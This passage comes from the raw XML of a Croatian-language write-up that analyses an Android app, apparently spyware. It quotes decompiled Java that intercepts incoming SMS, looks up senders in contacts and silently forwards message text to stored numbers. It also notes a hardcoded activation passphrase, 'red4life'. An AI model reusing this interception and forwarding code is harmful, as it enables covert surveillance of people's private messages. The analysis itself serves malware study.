          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                context.startActivity(intent1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            } else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            if(DBactivate.equalsIgnoreCase("Activate"))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>label1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    smsmanager = SmsManager.getDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    stringtokenizer = new StringTokenizer(DBforwardingNo, ",");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    stringbuffer = new StringBuffer(str);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    if(stringbuffer.length() &lt;= 160)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                        break label0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    for(; stringtokenizer.hasMoreTokens(); smsmanager.sendTextMessage(stringtokenizer.nextToken(), null, stringbuffer.substring(0, 0 + 160), null, null))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                        break label1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                    0 + 160;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRPr="0086242F" w:rsidRDefault="00FC73EB" w:rsidP="0086242F">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC73EB" w:rsidRDefault="00FC73EB" w:rsidP="00FC73EB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006E3F17" w:rsidRDefault="006E3F17" w:rsidP="006E3F17">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Iz koda je vidljivo da želi li se pokrenuti tu aktivnost, atribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> mora biti jednak ili varijabli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>DB_ui_pass</w:t>
      </w:r>
      <w:r w:rsidR="00EB7517">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> koja je vjeroj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>atno lozinka (dio imena pass skraćenica za password) spremljena u bazi podataka (dio imena DB) ili konstanti „</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>red4life</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>” neovisno o velikom i malom slovu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3F17" w:rsidRDefault="006E3F17" w:rsidP="006E3F17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t>Od ovog trenutka r</w:t>
      </w:r>
      <w:r w:rsidR="00EB7517">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ješen je prvi zadatak, ali dolaze dva nova:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3F17" w:rsidRDefault="006E3F17" w:rsidP="006E3F17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Otkriti kako se </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>String msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> inicijalizira</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3F17" w:rsidRDefault="006E3F17" w:rsidP="006E3F17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Otkriti koja je vrijednost varijable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>DB_ui_pass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3F17" w:rsidRDefault="006E3F17" w:rsidP="006E3F17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006E3F17" w:rsidRDefault="006E3F17" w:rsidP="006E3F17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Krene se redom:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3F17" w:rsidRPr="00711A86" w:rsidRDefault="006E3F17" w:rsidP="006E3F17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711A86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Inicijalizacija </w:t>
      </w:r>
      <w:r w:rsidRPr="00711A86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>String msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>_L4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>smsmessage = SmsMessage.createFromPdu((byte[])aobj[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        uri = Uri.withAppendedPath(android.provider.ContactsContract.PhoneLookup.CONTENT_FILTER_URI, Uri.encode(smsmessage.getDisplayOriginatingAddress().toString()));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        as = new String[1];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        as[0] = "display_name";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        cursor = contentresolver.query(uri, as, null, null, null);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        cursor.moveToFirst();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println((new StringBuilder("++++++++++++")).append(cursor.getString(0)).toString());</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        if(s != null)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            break MISSING_BLOCK_LABEL_420;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        s1 = (new StringBuilder("From:")).append(cursor.getString(0)).append(":").toString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        s = s1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>_L6:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msg = (new StringBuilder(String.valueOf(msg))).append(smsmessage.getMessageBody().toString()).toString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        i++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">          goto _L5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        indexoutofboundsexception;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        if(s == null)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">            s = (new StringBuilder("From:")).append(smsmessage.getDisplayOriginatingAddress().toString()).append(":").toString();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">          goto _L6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">        for(; stringtokenizer.hasMoreTokens(); smsmanager.sendTextMessage(stringtokenizer.nextToken(), null, stringbuffer.toString(), null, null));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">          goto _L2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3F17" w:rsidRPr="0086242F" w:rsidRDefault="00A761F9" w:rsidP="0086242F">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086242F">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRDefault="000C0B6F" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRDefault="00A761F9" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Iz odsječka koda je vidljivo da se </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> inicijalizira pomoću metode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>smsmessage.getMessageBody()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">. Da se pokaže točnost indicija, treba se provjeriti što je točno </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>smsmessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> te način stvaranja.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRDefault="00A761F9" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRDefault="00A761F9" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A761F9">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>SmsMessage smsmessage;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A761F9" w:rsidRDefault="00A761F9" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C0B6F" w:rsidRDefault="00A761F9" w:rsidP="00D212D3">
      <w:pPr>
        <w:rPr>
          <w:lang w:bidi="fa-IR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:tab/>
